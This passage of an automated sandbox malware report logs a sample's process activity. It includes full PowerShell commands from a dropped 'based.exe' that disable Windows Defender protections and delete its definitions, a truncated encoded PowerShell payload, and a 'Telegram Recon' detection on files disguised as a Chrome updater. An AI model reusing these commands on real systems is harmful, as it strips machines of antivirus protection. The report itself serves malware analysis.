Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8F9570 cpuid

0_2_00007FF72B8F9570

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

5_2_0043D0AB

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\python311.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\Desktop\iqA8j9yGcd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformation	Jump to behavior
